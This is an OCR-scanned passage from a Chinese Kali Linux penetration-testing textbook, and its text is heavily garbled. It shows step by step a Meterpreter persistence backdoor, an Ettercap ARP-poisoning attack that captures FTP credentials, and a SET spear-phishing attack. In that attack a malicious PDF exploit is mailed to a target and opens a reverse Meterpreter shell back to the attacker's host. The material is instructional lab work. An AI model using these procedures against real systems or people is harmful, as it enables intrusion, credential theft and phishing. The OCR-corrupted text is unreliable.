[*] Installing into autorun as HKCU\Software\Microsoft\Windows\ 


CurrentVersion\Run\mERugsle 

[+] Installed into autorun as HKCU\Software\Microsoft\Windows\ 

CurrentVersion\Run\mERugsle 

输出 的 信息 显示 了 创建 后 门 的 一 个 过 程 。 在 以 上 信息 中 可 以 看 到 ， 在 目标 系统 中 创建 
了 一 个 持久 脚本 ， 保 存在 C:IDOCUME~1\Test\LOCALS~1\Temp\IzXBdJvepnD.vbs. JE H., 
该 脚本 会 目 动 在 目标 主机 上 运行 ， 此 时 将 会 建立 第 二 个 Meterpreter 会 话 。 如 下 所 示 : 

meterpreter > [*] Meterpreter session 2 opened (192.168.41.234:443 -> 192.168.41.146:1032) at 

2014-05-07 16:25:47 +0800 


看 到 以 上 的 输出 信息 ， 表 示 该 持久 后 门 已 创建 成 功 。 
7.3.6 ”中间人 攻击 (MITM) 


中 间 人 攻击 (Man in the Middle Attack, 简称 “MITM 攻击 ”) 是 一 种 间接 的 入 侵 攻 击 。 
这 种 攻击 模式 是 通过 各 种 技术 手段 ， 将 受 入 侵 者 控制 的 一 台 计 算 机 虚拟 放置 在 网 络 连 接 中 
的 两 台 通 信人 计算 机 之 间 ， 这 台 计 算 机 就 称 为 “中 间 人 ”。 下 面 将 介绍 使 用 Ettercap THS 
现 中 间 人 攻击 。 

1. 存在 的 漏洞 

前 面 介 绍 了 中 间 人 攻击 是 通过 使 用 各 种 技术 手段 对 目标 主机 进行 攻击 的 。 主 机 既然 被 
攻击 ， 则 说 明 在 传输 数据 的 过 程 中 存在 有 漏洞 。 接 下 来 就 分 析 一 下 所 存在 的 漏洞 。 

当主 机 之 间 进 行 通信 时 ， 通 过 封装 数据 包 进 而 转发 到 目标 主机 上 。 转 发 的 数据 包 中 包 
括 源 IP 地 址 、 目 标 IP 地 址 及 MAC 地 址 。 但 是 当主 机 在 目 己 的 绥 存 表 中 找 不 到 目标 主机 
的 地 址 时 ， 它 会 发 送 ARP) 广播 ， 在 此 过 程 中 就 可 能 被 其 他 攻击 者 冒充 目标 主机 。 

2. ARP 欺 骗 原理 


实施 中 间 人 攻击 时 ,攻击 者 常 考虑 的 方式 是 ARP 欺骗 或 DNS 欺骗 等 .下 面 以 常见 ARP 
欺骗 为 例 ， 分 别 介绍 一 下 ARP 欺骗 原理 。 

一 般 情况 下 ，ARP 欺骗 并 不 是 使 网 络 无 法 正常 通信 ， 而 是 通过 冒充 网 关 或 其 他 主机 使 
得 到 达 网 关 或 主机 的 数据 流通 过 攻击 主机 进行 转发 。 通 过 转发 流量 可 以 对 流量 进行 控制 和 
查看 ， 从 而 控制 流量 或 得 到 机 密 信息 。ARP 欺骗 主机 的 流程 如 图 7.2 所 示 。 

如 图 7.2 所 示 ， 当 主机 A 和 主机 B 之 间 通 信 时 ， 如 果 主 机 A 在 上 自己 的 ARP 缓存 表 中 
没有 找到 主机 也 的 MAC 地 址 时 ， 主 机 A 将 会 回 整 个 局 域 网 中 所 有 计算 机 发 送 ARP 广播 ， 
广播 后 整个 局 域 网 中 的 计算 机 都 收 到 了 该 数据 。 这 时 候 ， 主 机 C 啊 应 主机 A， 说 我 是 主机 
B, 我 的 MAC 地 址 是 XX-XX-XX-XX-XX-XX， 主 机 A 收 到 地 址 后 就 会 重新 更 新 自己 的 组 
K. KENA 再 次 与 主机 也 通信 时 ， 该 数据 将 被 转发 到 攻击 主机 〈 主 机 C) 上 ， 则 该 数 
据 流 会 经 过 主机 C 转发 到 主机 B. 
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主机 A 到 主机 B 的 流量 需要 经 过 PC3 转 发 


我 是 主机 A, 我 的 MAC 地 址 
JÉ XX-XX- XX-XX-XX-XX 
(主机 C 的 MAC 地 址 ) 


我 是 主机 B ,我 的 MAC 地 址 
是 XXX XXXX XXX 
(主机 C 的 MAC 地 址 ) 


图 7.2 ARP 欺骗 主机 


3. 中 间 人 攻击 


实现 中 间 人 攻击 分 为 两 个 阶段 。 第 一 是 通过 某 种 手段 去 攻击 一 台 计 算 机 ; 第 二 是 欺骗 
主机 。 这 两 个 阶段 工作 工程 如 图 7.3 和 图 7.4 所 示 。 


C j ARP iE AJX iti É j 


主机 A 主机 B (攻击 者 ) 
图 7.3 ARP 注入 攻击 


在 该 阶段 主机 B 通过 ARP 注入 攻击 的 方法 以 实现 ARP 欺骗 ， 通 过 ARP 欺骗 的 方法 
控制 主机 A 与 其 他 主机 间 的 流量 及 机 密 信 息 。 

第 二 阶段 : 

在 第 一 个 阶段 攻击 成 功 后 ， 主 机 B 就 可 以 在 这 个 网 络 中 使 用 中 间 人 的 有 身份 ， 转 发 或 查 
看 主机 A 和 其 他 主机 间 的 数据 流 ， 如 图 7.4 所 示 。 


Cy 请 求 
伪造 ARP 应答 报 文 
-n> > 


LAN 主机 B (攻击 者 ) 


主机 C 
图 7.4 中 间 人 攻击 机 制 
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(IT 关 在 这 个 局 域 网 中 当主 机 A TEDL C 发 送 请 求 ， 此 时 该 数据 将 被 发 送 到 主机 了 上 。 

(2) 主机 A 发 送 给 主机 C 的 数据 流 将 会 经 主机 B 转发 到 主机 C 上 。 

(3) 主机 C 收 到 数据 以 为 是 主机 A 直接 发 送 的 。 此 时 主机 C 将 啊 应 主机 A 的 请 求 ， 
同样 的 该 数据 流 将 会 被 主机 B 转发 到 主机 A 上 。 

(4) 主机 A 收 到 啊 应 后 ， 将 登录 主机 C。 这 样 主机 A 登录 时 的 用 户 名 及 密码 ， 将 会 被 
主机 B 查看 到 。 

使 用 Ettercap 工具 实现 中 间 人 攻击 。 具 体操 作 步 又 如 下 所 示 。 

(1) Jaa Ettercap 工具 。 执 行 命令 如 下 所 示 : 

root@kali:~# ettercap -G 


执行 以 上 命令 后 ， 将 显示 如 图 7.5 所 示 的 界面 。 


cttercap 0.8.0 


File Sniff Options ? 


| 7.5 Ettercap 启动 界面 


(2) 该 界面 是 Ettercap 工具 的 初始 界面 。 接 下 来 通过 抓 包 的 方法 实现 中 间 人 攻击 。 在 
菜单 栏 中 依次 选择 SnifflUnified sniffing ar TZ P Shift+U 组 合 键 ， 将 显示 如 图 7.6 所 示 
的 界面 。 

ettercap 0.8.0 


File | Options ? 
Unified sniffing... Shift+U 


Bridged sniffing... Shift+B 


Set pcap filter... P 


图 7.6 Jan d 
(3) 在 该 界面 单 击 Unified sniffing 命令 后 ， 将 显示 如 图 7.7 所 示 的 界面 。 
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ettercap Input 


"r3 


图 7.7 选择 接口 


(4) 在 该 界面 选择 网 络 接口 。 这 里 选择 eth0， 然 后 单 击 “确定 ”按钮 ， 将 显示 如 图 7.8 
所 示 的 界面 。 


ettercap 0.8.0 


Start Targets Hosts View Mitm Filters Logging Plugins ? 


33 plugins 


42 protocol dissectors 

57 ports monitored 
16074 mac vendor fingerprint 
1766 tcp OS fingerprint 
2182 known services 


图 7.8 局 动 接口 界面 


(5) 局 动 接口 后 ， 就 可 以 扫描 所 有 的 主机 了 。 在 菜单 栏 中 依次 选择 Hosts|Scan for hosts 
命令 或 按 下 Ctrl+S 组 合 键 ， 如 图 7.9 所 示 。 


ettercap 0.8.0 -[üu[|x 
Start Targets === | View Mitm Filters Logging Plugins ? 
Hosts list H 
Scan for hosts Ctrl+S 
Load from file... Ctri+O 


£ Save to file... Ctrl+S a 


图 7.9 ”启动 扫描 主机 


(6) 在 该 界面 单 击 Scan for hosts 命令 后 ， 将 显示 如 图 7.10 所 示 的 界面 。 


CI) 从 该 界面 输出 的 信息 可 以 看 到 共 扫 接 到 五 台 主 机 。 如 果 要 查看 扫描 到 主机 的 信息 ， 
在 菜单 栏 中 依次 选择 Hosts|Hosts list 命令 或 按 下 H 8, WA 7.11 Ara. 


(8) 在 该 界面 单 击 Hosts list 命令 后 ， 将 显示 如 图 7.12 所 示 的 界面 。 


SE 
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ettercap 0.8.0 


Start Targets Hosts View Mitm Filters Logging Plugins ? 


Privileges dropped to UID 65534 GID 65534... 


33 plugins 

42 protocol dissectors 

57 ports monitored 
16074 mac vendor fingerprint 
1766 tcp OS fingerprint 
2182 known services 
Randomizing 255 hosts for scanning... 
Scanning the whole netmask for 255 hosts... 
5 hosts added to the hosts list... 


图 7.10 扫描 主机 界面 


Hosts list 


Scan for hosts Ctrl 十 S 
Load from file... Ctrl+O 


Save to file... Ctri+S 


E 


图 7.11 打开 主机 列表 


ettercap 0.8.0 - | 口 | 藉 


Start Targets Hosts View Mitm Filters Logging Plugins ? 


r 


| Host List M 


IP Address | MAC Address Description 
192.168.41.1 . 00:50:56:C0:00:08 


192.168.41.2 . 00:50:56:E9:AF:47 
192.168.41.146 00:0C:29:48:66:40 
192.168.41.151 00:0C:29:50:F9:AE 
192.168.41.254 00:50:56:EE:5D:9E 


Add to Target 1 Add to Target 2 


33 plugins 

42 protocol dissectors 

57 ports monitored 
16074 mac vendor fingerprint 
1766 tcp OS fingerprint 
2182 known services 


Randomizing 255 hosts for scanning... 
Scanning the whole netmask for 255 hosts... 
5 hosts added to the hosts list... 


图 7.12 扫描 到 的 所 有 主机 
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(9 六 该 界面 显示 了 扫描 到 的 五 台 主 机 的 王 地 址 和 MAC 地址。 在 该 界面 选择 其 中 一 台 
主机 ， 作 为 目标 系统 。 这 里 选择 192.168.41.151 主机 ， 然 后 单 击 Add to Target 1 按钮 。 添 
加 目标 系统 后 开始 员 探 数据 包 , 在 菜单 栏 中 依次 选择 Start|Start sniffing 命令 或 按 下 Ctrl+W 
组 合 键 ， 如 图 7.13 所 示 。 


ettercap 0.8.0 


Start sniffing Ctri+Ww 


Stop sniffing Ctri+E 


Exit 


图 7.13 ”开始 扫描 


(10) 局 动 噢 探 后 ， 通 过 使 用 ARP 注入 攻击 的 方法 获取 到 目标 系统 的 重要 信息 。 局 动 
ARP 注入 攻击 ， 在 菜单 栏 中 依次 选择 Mitm|Arp poisonig.… 命 令 ， 如 图 7.14 所 示 。 


Arp poisoning... 
Icmp redirect... 


Port stealing... 
192.168.41.1 . 00:50:56:CC 


192.168.41.2  00:50:56:E9 
192.168.41.146 Aari: Stop mitm attack(s) 


Dhcp spoofing... 


7.14 Arp 注入 攻击 图 


(11) 单 击 Arp poisonig 命令 后 ， 将 显示 如 图 7.15 所 示 的 界面 。 在 该 界面 选择 攻击 的 
选项 ， 这 里 选择 Sniff remote connections。 然 后 单 击 “ 确 定 ” 按 钮 ， 将 显示 如 图 7.16 Pras 
的 界面 。 


ettercap 0.8.0 
Start Targets Hosts View Mitm Filters Logging Plugins ? 


Host List M 


IP Address | MAC Address Description 
192.168.41.1 00:50:56:C0:00:08 
192.168.41.2 00:50:56:E9:AF:47 
192.168.41.146 00:0C:29:48:66:40 
192.168.41.151 00:0C:29:50:F9:AE 
192.168.41.254 00:50:56:EE:5D:9E 


Add to Target 1 Add to Target 2 


tarting Unified sniffing... 


DHCP: [00:0C:29:50:F9:AE] REQUEST 192.168.41.151 


DHCP: [192.168.41.254] ACK : 192.168.41.151 255.255.255.0 GW 192.168.41.2 DNS 
192.168.41.2 "Localdomain" 


MITM Attack: ARP Poisoning (于 nobody) 


"Opt onal parameters 


O Only poson one-way. 


k | WE (0) | 取消 (C) | 


图 7.1$ 攻击 选项 图 7.16 攻击 界面 


ARP poisoning victims: 
GROUP 1: 192.168.41.151 00:0C:29:50:F9:AE 


GROUP 2: ANY (all the hosts in the list) 


"2I 
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(129 此 时 ， 当 某 个 用 户 登 录 192.168.41.151 主机 时 ， 它 的 敏感 信息 将 会 被 传递 给 攻击 
省 < 本 例 中 捕获 到 的 敏感 信息 如 图 7.17 所 示 。 


ettercap 0.8.0 


Start Targets Hosts View Mitm Filters Logging Plugins ? 


Host List M 


IP Address MAC Address | Description 
192.168.41.1 . 00:50:56:C0:00:08 
192.168.41.2 . 00:50:56:E9:AF:47 
192.168.41.146 00:0C:29:48:66:40 
192.168.41.151 00:0C:29:50:F9:AE 
192.168.41.254 00:50:56:EE:5D:9E 


Add to Target 1 Add to Target 2 


192.168.41.2 "Localdomain" 
ARP poisoning victims: 
GROUP 1: 192.168.41.151 00:0C:29:50:F9:AE 


GROUP 2 : ANY (all the hosts in the list) 

FTP:192.168.41.151:21 -» USER: anonymous PASS: 123456 

DHCP: [00:0C:29:50:F9:AE] REQUEST 192.168.41.151 

DHCP: [192.168.41.254] ACK : 192.168.41.151 255.255.255.0 GW 192.168.41.2 DNS 
192.168.41.2 "Local domain" 


图 7.17 捕获 到 的 敏感 信息 


(13) 从 该 界面 可 以 看 到 ， 有 用 户 登 录 192.168.41.151 主机 的 FTP 服务 器 了 。 其 用 户 名 
为 — 密码 为 123456. SRK HE BUR SIEM TR, FESR ALES AK ATG Start|Stop 
sniffing 命令 ， 如 图 7.18 所 示 。 

(14) 停止 噢 探 后 ， 还 需要 停止 中 间 人 攻击 。 在 沫 单 栏 中 依次 单 击 Mitm|Stop mitm 
attack(s) 命 令 ， 将 显示 如 图 7.19 所 示 的 界面 。 


ettercap 0.8.0 


(于 nobody) 


wy MITM attack(s) stopped 


Targets Hosts View Mitm Filters Logging Plugins ? 
Start sniffing Ctri--W 


Stop sniffing Ctrl+E 
Description 


Exit Ctrl 十 头 0:00:08 


. 


图 7.18 EMR 图 7.19 停止 中 间 人 攻击 


(15) 在 该 界面 单 击 “ 确 定 ” 按 钮 ， 这 样 就 成 功 的 完成 了 中 间 人 攻击 。 
7.4 使 用 SET 实施 攻击 
前 面 介 绍 了 社会 工程 学 工具 包 CSET) 的 简单 使 用 。 为 了 能 帮助 用 户 更 容易 的 理解 社 


会 工程 学 的 强大 功能 。 本 节 将 介绍 使 用 社会 工程 学 工具 包 实 施 各 种 攻击 。 
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7-4.1 针对 性 钓鱼 攻击 向量 


针对 性 钓鱼 攻击 问 量 通过 构造 特殊 文件 格式 的 漏洞 进行 渗透 攻击 ， 如 利用 Adobe 

Reader 8.1.0 (PDF 阅读 器 ) 的 漏洞 。 实 现 钓鱼 攻击 癌 量 主要 通过 发 送 邮件 附件 的 方式 ， 将 
侣 渗透 代 但 的 文件 发 送 到 目标 主机 。 当 目标 主机 的 用 户 打 开 邮 件 附 件 时 ， 目 标 主机 融会 

被 攻陷 和 控制 。 

SET 使 用 简单 邮件 管理 协议 CSMTPO 的 开放 代理 《匿名 的 或 者 需 认 证 的 ) . Gmail 
和 Sendmail 来 发 送 邮 件 。SET 同时 也 使 用 标准 电子 邮件 和 基于 HTML 格式 的 电子 邮件 来 
发 动 钓鱼 攻击 。 

【实例 7-1】 使 用 SET 实现 钓鱼 攻击 问 量 ， 本 例 中 通过 发 送 存在 渗透 代码 的 PDF 格式 
文件 到 目标 主机 。 具 体操 作 步 又 如 下 所 示 。 

(D 启动 社会 工程 学 。 执 行 命令 如 下 所 示 : 

root@kali:~# setoolkit 

[-] New set config.py file generated on: 2014-06-06 18:33:39.854805 


[-] Verifying configuration update... 
[*] Update verified, config timestamp is: 2014-06-06 18:33:39.854805 


[*] SET is using the new config, no need to restart 


ee ees ee 
en, NEN enn | 
EE ey Rl 

/ Er AP AP 
[---] The Social-Engineer Toolkit (SET) [---] 
[---] Created by: David Kennedy (ReL1K) [---] 
= Version: 5.4.2 [=] 
[---] Codename: 'Walkers' [---] 
[---] Follow us on Twitter: @TrustedSec [---] 
[---] Follow me on Twitter: @HackingDave [---] 
[---] Homepage: https://www.trustedsec.com [---] 


Welcome to the Social-Engineer Toolkit (SET). 
The one stop shop for all of your SE needs. 
Join us on irc.freenode.net in channel #setoolkit 
The Social-Engineer Toolkit is a product of TrustedSec. 
Visit: https://www.trustedsec.com 
Select from the menu: # 渗 透 攻 击 菜单 


1) Social-Engineering Attacks 

2) Fast-Track Penetration Testing 

3) Third Party Modules 

4) Update the Metasploit Framework 
5) Update the Social-Engineer Toolkit 
6) Update SET configuration 

7) Help, Credits, and About 


99) Exit the Social-Engineer Toolkit 


set> 
(2) 在 以 上 沫 单 中 选择 社会 工程 学 ， 编 号 为 1， 如 下 所 示 : 
set> 1 


D 
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I\ /\\ 
I Y 
II Social-Engineer Toolkit !! \ 
H Ho! 
I Free Wot 
I Hog 
I #hugs Hog 
I Hog 
I By: TrustedSec He / 
Il II / 
1/ VW 
E eL 
| 1/ 
/oooo 0000 0oooo oooo/! 
/00000000000000000000000/ / 
/00000000000000000000000/ / 
/C= B 
[---] The Social-Engineer Toolkit (SET) [---] 
[---] Created by: David Kennedy (ReL1K) [---] 
[---] Version: 5.4.2 [---] 
[---] Codename: 'Walkers' [---] 
[---] Follow us on Twitter: @TrustedSec [---] 
[---] Follow me on Twitter: @HackingDave [---] 
[---] Homepage: https://www.trustedsec.com [---] 


Welcome to the Social-Engineer Toolkit (SET). 
The one stop shop for all of your SE needs. 
Join us on irc.freenode.net in channel #setoolkit 
The Social-Engineer Toolkit is a product of TrustedSec. 
Visit: https://www.trustedsec.com 
Select from the menu: 
1) Spear-Phishing Attack Vectors 
2) Website Attack Vectors 
3) Infectious Media Generator 
4) Create a Payload and Listener 
5) Mass Mailer Attack 
6) Arduino-Based Attack Vector 
7) SMS Spoofing Attack Vector 
8) Wireless Access Point Attack Vector 
9) QRCode Generator Attack Vector 
10) Powershell Attack Vectors 
11) Third Party Modules 
99) Return back to the main menu. 


set> 
(3) 在 以 上 玉音 中 选择 攻击 类 型 。 这 里 选择 钓鱼 攻击 癌 量 ， 编 号 为 1， 如 下 所 示 : 
set> 1 


The Spearphishing module allows you to specially craft email messages and send 
them to a large (or small) number of people with attached fileformat malicious 
payloads. If you want to spoof your email address, be sure "Sendmail" is in- 
stalled (apt-get install sendmail) and change the config/set_config SENDMAIL=OFF 
flag to SENDMAIL=ON. 
There are two options, one is getting your feet wet and letting SET do 

everything for you (option 1), the second is to create your own FileFormat 
payload and use it in your own attack. Either way, good luck and enjoy! 

1) Perform a Mass Email Attack 

2) Create a FileFormat Payload 

3) Create a Social-Engineering Template 

99) Return to Main Menu 


"Xs 
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以 上 和 输出 的 信息 显示 了 钓鱼 攻击 问 量 中 可 用 的 工具 载 衙 。 
(4) 这 里 选择 大 规模 电子 邮件 攻击 ， 编 号 为 1， 如 下 所 示 : 


set:phishing>1 
Select the file format exploit you want. 
The default is the PDF embedded EXE. 
六 六 六 六 六 六 六 六 冰冰 PAYLOADS deese 
1) SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP) 
2) SET Custom Written Document UNC LM SMB Capture Attack 
3) Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow 
4) Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087) 
5) Adobe Flash Player "Button" Remote Code Execution 
6) Adobe CoolType SING Table "uniqueName" Overflow 
T) Adobe Flash Player "newfunction" Invalid Pointer Use 
8) Adobe Collab.collectEmaillnfo Buffer Overflow 
9) Adobe Collab.getlcon Buffer Overflow 
10) Adobe JBIG2Decode Memory Corruption Exploit 
11) Adobe PDF Embedded EXE Social Engineering 
12) Adobe util.printf() Buffer Overflow 
13) Custom EXE to VBA (sent via RAR) (RAR required) 
14) Adobe U3D CLODProgressiveMeshDeclaration Array Overrun 
15) Adobe PDF Embedded EXE Social Engineering (NOJS) 
16) Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow 
17) Apple QuickTime PICT PnSize Buffer Overflow 
18) Nuance PDF Reader v6.0 Launch Stack Buffer Overflow 
19) Adobe Reader u3D Memory Corruption Vulnerability 
20) MSCOMCTL ActiveX Buffer Overflow (ms12-027) 
set:payloads>8 


输出 的 信息 显示 了 钓鱼 攻击 癌 量 中 可 以 使 用 的 文件 格式 ， 默 认 是 PDF 格式 。 
(5) 这 里 利用 Abobe PDF 的 Collab.collectEmaillnfo 漏洞 ， 所 以 选择 编号 8， 如 下 所 示 : 


1) Windows Reverse TCP Shell Spawn a command shell on victim 
and send back to attacker 

2) Windows Meterpreter Reverse_TCP Spawn a meterpreter shell on 
victim and send back to attacker 

3) Windows Reverse VNC DLL Spawn a VNC server on victim and 
send back to attacker 

4) Windows Reverse TCP Shell (x64) Windows X64 Command Shell, 


Reverse TCP Inline 
5) Windows Meterpreter Reverse_TCP (X64) . Connect back to the attacker 
(Windows x64), Meterpreter 


6) Windows Shell Bind TCP (X64) Execute payload and create an 
accepting port on remote system 
7) Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP 


using SSL and use Meterpreter 


以 上 信息 显示 了 攻击 的 方式 。 
(6) 这 里 选择 第 2 个 模块 ， 如 下 所 示 : 


set:payloads>2 

set» IP address for the payload listener:192.168.41.156 夫人 置 攻击 主机 的 地 址 
set:payloads> Port to connect back on [443]: # 设 置 攻击 主机 的 端口 号 
[-] Defaulting to port 443... 

[-] Generating fileformat exploit... 

[*] Payload creation complete. 

[*] All payloads get sent to the /root/.set/template.pdf directory 

[-] As an added bonus, use the file-format creator in SET to create your attachment. 
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Right now the attachment will be imported with filename oftemplate. 
whatever 
Do you want to rename the file? 
example Enter the new filename: moo.pdf 
1. Keep the filename, | don't care. 
2. Rename the file, | want to be cool. 


从 以 上 输出 信息 中 ， 可 以 看 到 攻击 载 傈 创建 完成 。 所 有 攻击 载 人 向 保存 在 /root/.set/ 中 ， 
文件 名 为 template.pdf. 

(7) 这 里 选择 是 否 重 命名 该 文件 。 这 里 使 用 默认 的 PDF 文件 template.pdf, 输入 编写 1, 
如 下 所 示 : 


set:phishing>1 

[*] Keeping the filename and moving on. 
Social Engineer Toolkit Mass E-Mailer 
There are two options on the mass e-mailer, the first would 
be to send an email to one individual person. The second option 
will allow you to import a list and send it to as many people as 
you want within that list. 
What do you want to do: 
1. E-Mail Attack Single Email Address 
2. E-Mail Attack Mass Mailer 
99. Return to main menu. 


输出 信息 显示 了 邮件 攻击 的 方式 。 
(8) 这 里 选择 针对 单一 邮件 地 址 进行 攻击 ， 输 入 编号 1， 如 下 所 示 : 
set:phishing>1 


Do you want to use a predefined template or craft 
a one time email template. 


1. Pre-Defined Template 
2. One-Time Use Email Template 


输出 的 信息 提示 是 否 要 使 用 一 个 预先 定义 的 模块 。SET 允许 攻击 者 创建 不 同 的 模板 ， 


并 且 在 使 用 时 支持 动态 导入 。 
(9) 这 里 使 用 预先 定义 的 模块 ， 输 入 编号 1， 如 下 所 示 : 
set:phishing>1 


[-] Available templates: 

: Have you seen this? 

: How long has it been? 

: Strange internet usage from your computer 
: Status Report 

: New Update 

: Computer Issue 

: Dan Brown's Angels & Demons 

: Order Confirmation 


ONOnRWNDM — 


10: Baby Pics 


输出 的 信息 显示 了 所 有 可 用 的 模块 。 
(10) 这 里 选择 使 用 预先 定义 的 SET 邮件 模板 Status Report， 输 入 编写 4， 如 下 所 示 : 


set:phishing>4 
set:phishing> Send email to:********(@ 126.com # 设 置 发 送 邮 件 的 目的 地 址 
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1. Use a gmail Account for your email attack. 
2. Use your own server or open relay 


输出 信息 显示 了 给 目标 主机 发 送 地 址 的 方法 。 
C11) 这 里 选择 使 用 Gmail 邮箱 账号 ， 输 入 编号 1， 如 下 所 示 : 


set:phishing>1 

set:phishing> Your gmail email address:***********@gmail.com #47, Gmail 邮件 账户 
set:phishing> The FROM NAME user will see: : 

Email password: # 输 入 邮箱 密码 
set:phishing> Flag this message/s as high priority? [yes|no]:yes 

[*] SET has finished delivering the emails 

set:phishing> Setup a listener [yes|no]: 


从 输出 信息 中 ， 可 以 看 到 SET 传递 邮件 设置 完成 。 此 时 束 可 以 使 用 该 Gmail WE", 25 
输入 的 目的 邮件 地 址 Creek (0126.com) 发 送 恶意 文件 。 最 后 ,提示 是 否 设置 一 个 监听 。 

(12) 这 里 设置 一 个 监听 ， 用 来 监听 攻击 载 苘 反弹 连 接 。 当 SET 局 动 Metasploit H, 
它 已 经 配置 了 所 有 必需 的 选项 , 将 开始 处 理 攻 击 主机 的 卫 反 回 连接 到 443 9m L1, 4H P AAS: 

set:phishing> Setup a listener [yes|no]:yes 

1 * WARNING: Database support has been disabled 

[-] *** 


# cowsay++ 


< metasploit > 


| 
Tired of typing 'set RHOSTS'? Click & pwn with Metasploit Pro 
-- type 'go pro' to launch it now. 
-[ metasploit v4.8.2-2014010101 [core:4.8 api: 1.0] 
+ -- --=[ 1246 exploits - 678 auxiliary - 198 post 
+ -- --=[ 324 payloads - 32 encoders - 8 nops 
[*] Processing /root/.set/meta_config for ERB directives. 
resource (/root/.set/meta_config)> use exploit/multi/handler 
resource (/root/.set/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp 
PAYLOAD => windows/meterpreter/reverse_tcp 
resource (/root/.set/meta_config)> set LHOST 192.168.41.156 
LHOST => 192.168.41.156 
resource (/root/.set/meta_config)> set LPORT 443 
LPORT => 443 
resource (/root/.set/meta_config)> set ENCODING shikata ga nai 
ENCODING => shikata_ga_nai 
resource (/root/.set/meta_config)> set ExitOnSession false 
ExitOnSession => false 
resource (/root/.set/meta config)» exploit -j 
[*] Exploit running as background job. 
msf exploit(handler) > 
[*] Started reverse handler on 192.168.41.156:443 
[*] Starting the payload handler... 
msf exploit(handler) > 
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动 的 连接 到 攻击 主机 192.168.41.156:443 。 

此 时 攻击 主机 可 以 将 前 面 创 建 的 template.pdf 文件 ， 通 过 电子 邮件 发 送 给 目标 。 当 目 
标 用 户 打 开 它 并 认为 是 合法 的 PDF 文件 时 ， 此 时 目标 主机 被 立即 控制 。 在 攻击 主机 上 ， 将 
看 到 如 下 所 示 的 信息 : 

msf exploit(handler) > 

[*] Sending stage (769024 bytes) to 192.168.41.146 


[*] Meterpreter session 1 opened (192.168.41.156:443 -> 192.168.41.146:1083) at 2014-06-07 
11:17:11 +0800 


输出 的 信息 表示 ， 被 攻击 主机 的 地 址 是 192.168.41.146。 此 时 ， 攻 击 主机 与 目标 主机 
成 功 的 建立 了 一 个 会 话 ， 如 下 所 示 : 


msf exploit(handler) > sessions 
Active sessions 


Id Type Information Connection 


1 meterpreter x86/win32 AA-8860KJM26FSWATest (à  AA-8860KJM26FSW 
192.168.41.156:443 -> 192.168.41.146:1083 (192.168.41.146) 


从 输出 的 信息 中 ， 可 以 看 到 有 一 个 会 话 。 该 会 话 中 ， 描 述 了 目标 主机 的 相关 信息 。 如 
操作 系统 类 型 为 win32、 主 机 名 为 AA-886O0KJM26FSW、 登 录 的 用 户 为 Test 及 主机 IP 地 
址 。 激 活该 会 话 后 ， 就 可 以 在 目标 主机 上 进行 任何 操作 。 也 就 说 相当 于 控制 了 目标 主机 。 
激活 会 话 ， 如 下 所 示 : 


msf exploit(handler) > sessions -i 1 
[*] Starting interaction with 1... 
meterpreter > 


从 输出 的 信息 中 可 以 看 到 会 话 1 被 成 功 激活 。 此 时 就 可 以 在 meterpreter 命令 行 下 ， 执 
行 各 种 命令 。 如 登录 日 标 主 机 的 Shell， 如 下 所 示 : 


meterpreter > shell 

[-] Failed to spawn shell with thread impersonation. Retrying without it. 
Process 792 created. 

Channel 2 created. 

Microsoft Windows XP [版 本 5.1.2600] 

(C) 版 权 所 有 1985-2001 Microsoft Corp. 

C:\Documents and Settings\Test\ 桌 面 > 


输出 信息 显示 为 C:\Documents and Settings\Test\ 桌 面 >， 表 示 成 功 登录 到 目标 主机 。 此 
时 相当 于 是 以 Test 用 户 的 喘 份 ， 在 目标 主机 中 进行 操作 。 查 看 当前 目录 中 的 文件 夹 ， 如 下 
所 示 : 


C:\Documents and Settings\Test\ 桌 面 >dir # 列 出 目录 中 的 所 有 文件 
dir 
驱动 器 C 中 的 卷 没 有 标签 
卷 的 序列 号 是 1806-07F4 
C:\Documents and Settings\Test\ 桌 面 的 目录 
2014-06-07 11:11 <DIR> 
2014-06-07 11:11 <DIR> 


2014-05-06 19:46 54 111.txt 

2014-06-07 11:00 5/,364,480 AdbeRdr810 zh CN.msi 
2014-06-06 16:01 46,844 JEdB20ma/AEGV/G.pdf 
2014-06-06 18:54 6,619 template.pdf 
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4 个 文件 57,417,997 字 节 
2 个 目录 38,359,552,000 可 用 字 节 
输出 的 信息 显示 了 目标 主机 时 和 面 上 的 所 有 文件 及 目录 。 还 可 以 查看 文件 的 内 容 ， 如 下 
所 示 : 


C:\Documents and Settings\Test\ 桌 面 >type 111.txt # 查 看 文件 内 容 
type 111.txt 
Ethernet adapter 本 地 连接 : 

Connection-specific DNS Suffix  . : localdomain 

IP Address. ...........:192.168.41.146 

Subnet Mask ...........:255255255)0 

Default Gateway .........:192.168.412 


输出 的 信息 显示 了 lll txt 文件 的 内 容 。 


74.2 Web 攻击 向 量 


Web 攻击 问 量 会 特 总 构造 出 一 些 对 目标 而 言 是 可 信 且 具有 诱惑 力 的 网 页 。SET 中 的 
Web 攻击 问 量 可 以 复制 出 和 实际 运行 的 可 信 站 点 ， 看 起 来 和 网 页 完全 一 样 。 这 样 ， 目 标 用 
户 以 为 目 己 正在 访问 一 个 合法 的 站 点 ， 而 不 会 想到 是 被 攻击 。 本 小 节 将 介绍 使 用 SET 实现 
Web 攻击 问 量 。 

【实例 7-2】 下 面 使 用 Java applet 攻击 实现 Web 攻击 向 量 。 具 体操 作 步 又 如 下 所 示 。 

Java applet 攻击 引入 了 恶意 Java applet 程序 进行 智能 化 的 浏览 器 检查 ， 确 保 applet 能 
在 目标 浏览 器 中 正确 运行 ， 同 时 也 能 在 目标 主机 上 运行 攻击 载荷 。Java applet 攻击 并 不 被 
认为 是 Java 本 喘 的 漏洞 ， 只 是 当 受 攻击 目标 浏览 恶意 网 页 时 ， 网 页 会 弹出 一 个 和 警告。 该 警 
告 信息 询问 是 否 需要 运行 一 个 不 被 信任 的 Java applet 程序。 由 于 Java 允许 用 户 对 一 个 apple 
选择 任意 名 字 进 行 签名 ， 用 户 可 以 为 它 的 发 布 者 定义 为 Google 和 Microsoft 等 。 这 样 ， 很 
容易 使 一 些 人 遭受 攻击 。 

COD 启动 社会 工程 学 。 执 行 命令 如 下 所 示 : 

root@kali:~# setoolkit 

Select from the menu: 

1) Social-Engineering Attacks 

2) Fast-Track Penetration Testing 

3) Third Party Modules 

4) Update the Metasploit Framework 
